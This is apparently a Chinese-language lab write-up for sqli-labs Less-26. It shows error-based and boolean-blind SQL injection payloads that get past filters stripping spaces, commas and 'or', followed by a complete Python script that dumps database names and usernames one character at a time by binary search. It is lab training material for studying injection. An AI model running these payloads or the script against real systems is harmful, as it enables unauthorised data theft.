利用報錯注入證明可以 dump 數據
http://127.0.0.1/Less-26/?id=0%27||(updatexml(1,concat(0x5e,version(),0x5e),1))||%27%27=%27dsa
重新利用盲注腳本批量跑
這個好叼
select(mid(user()from(4)for(1)))
沒有空格，沒有逗號（改用括號分隔、`mid(... from ... for ...)` 取代逗號形式）
select(schema_name)from(information_schema.schemata)
這樣也沒有空格
然後結合一下
select(mid((concat((select(group_concat(username))from(users))))from(7)for(1)));
只需要修改中間的 select 子句和 from 後面的偏移量就可以 dump 數據（注意 `for`、`information` 本身含有 `or`，目標若過濾 `or`，要寫成 `foorr`、`infoorrmation`，過濾後才會還原）
select(ascii(mid((concat((select(group_concat(username))from(users))))from(7)for(1)))>255);
這樣就可以盲注
select(ascii(mid((concat((select(group_concat(schema_name))from(information_schema.schemata))))from(7)for(1)))<255);
測試一下 :
#!/usr/bin/env python
# encoding:utf8
import requests
import time
import sys
# config-start
# NOTE(review): neither constant is referenced anywhere in this script -- the
# oracle below is boolean-based (checks a marker string in the response), not
# time-based, so these look like leftovers from a time-based template.
sleep_time = 5
error_time = 1
# config-end
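def getPayload(indexOfChar, mid, column_name="schema_name", table_name="schemata", database_name="information_schema"):
    """Build the boolean-based injection value for one character position.

    The injected expression asks MySQL whether
    ``ascii(mid(<group_concat of column> from indexOfChar for 1)) > mid``.
    It is shaped for a filter that strips spaces, commas and the substring
    ``or``: every token is wrapped in parentheses instead of being separated
    by spaces, ``mid(... from ... for ...)`` replaces the comma form, and
    every ``or`` is doubled to ``oorr`` so that one deletion pass restores the
    keyword.  The doubling is applied to the whole string on purpose --
    ``for`` and ``information`` contain ``or`` as well.

    Args:
        indexOfChar: 1-based character offset handed to MID(); int or str.
        mid: ASCII threshold compared with ``>``; int or str.
        column_name: column to extract (group_concat'ed into one string).
        table_name: table that holds ``column_name``.
        database_name: schema that holds ``table_name``.  The defaults list the
            schema names from information_schema, as the original did.

    Returns:
        The raw, un-URL-encoded string to append to the ``id=`` parameter.
    """
    query = (
        "select(ascii(mid((concat((select(group_concat({col}))from({db}.{tbl}))))"
        "from({idx})for(1)))>{threshold})"
    ).format(
        col=column_name,
        db=database_name,
        tbl=table_name,
        idx=str(indexOfChar),
        threshold=str(mid),
    )
    # 0'||( ... )||'1'='  -- the application supplies the closing quote, so the
    # comparison is OR-ed into the original WHERE clause.
    payload = "0'||(" + query + ")||'1'='"
    # Bypass the `or` filter: each "or" is removed once, so "oorr" -> "or".
    return payload.replace("or", "oorr")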
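def exce(indexOfChar, mid, base_url="http://127.0.0.1/Less-26/?id=", timeout=10):
    """Send one oracle request and report whether the injected condition held.

    Args:
        indexOfChar: 1-based offset forwarded to getPayload.
        mid: ASCII threshold forwarded to getPayload.
        base_url: URL prefix the payload is appended to (the lab's Less-26 page
            by default).
        timeout: seconds to wait for the response.  Without a timeout a stalled
            target would hang the whole extraction indefinitely.

    Returns:
        True when the response contains the logged-in marker, i.e. the OR-ed
        condition was true; False otherwise.

    Raises:
        requests.RequestException on network failure.  Errors are deliberately
        not swallowed: a False returned on a failed request would silently
        corrupt the binary search rather than stop it.
    """
    target = base_url + getPayload(indexOfChar, mid)
    content = requests.get(target, timeout=timeout).text
    # The lab page prints this marker when the query returned a row; that is
    # the boolean oracle this script relies on.
    return "Your Login name:" in content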
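def doubleSearch(indexOfChar, left_number, right_number):
    """Binary-search the ASCII code of one character through the boolean oracle.

    exce() answers "ascii(char) > mid".  The search keeps the invariant
    ``left_number < code <= right_number`` and narrows the window until it is
    one wide, so the answer is the upper bound.  Consequences callers rely on:
    a code at or below the initial ``left_number`` comes back as
    ``left_number + 1`` (with the usual call ``(j, 0, 128)`` an exhausted
    string -- MID() yields '' and ASCII('') is 0 in MySQL -- is returned as
    chr(1)), and a code above ``right_number`` comes back as
    ``right_number``.

    Args:
        indexOfChar: 0-based character index; the SQL offset sent is index + 1.
        left_number: exclusive lower bound of the ASCII code.
        right_number: inclusive upper bound of the ASCII code; must be greater
            than ``left_number``.

    Returns:
        The one-character string chr(code).
    """
    low, high = left_number, right_number
    while high - low > 1:
        mid = (low + high) // 2
        if exce(str(indexOfChar + 1), str(mid)):
            low = mid    # code > mid
        else:
            high = mid   # code <= mid
    # One request per halving.  The previous version re-queried the last
    # midpoint to choose between low and high, which the invariant already
    # settles -- that was one wasted HTTP request per character.
    return chr(high)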
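def search(max_len=1024):
    """Extract the target string one character at a time and print it.

    Each position is recovered with doubleSearch over the ASCII window
    (0, 128].  Commas (group_concat's separator) are printed as newlines so
    every value lands on its own line.  This is a lab exercise against
    sqli-labs Less-26; only point it at systems you are authorised to test.

    Args:
        max_len: upper bound on the number of characters extracted; the loop
            stops earlier when the end-of-string sentinel is seen.
    """
    for position in range(max_len):
        char = doubleSearch(position, 0, 128)
        # Past the end of the string ASCII(MID(...)) is 0, which lies outside
        # the exclusive lower bound 0 and therefore comes back as chr(1):
        # that is the end-of-data sentinel.
        if ord(char) == 1:
            break
        if char == ",":
            print("")
        else:
            sys.stdout.write(char)
            sys.stdout.flush()
    print("")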
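# Guard the entry point so importing this module (e.g. to reuse getPayload)
# does not start firing requests at the target.
if __name__ == "__main__":
    search()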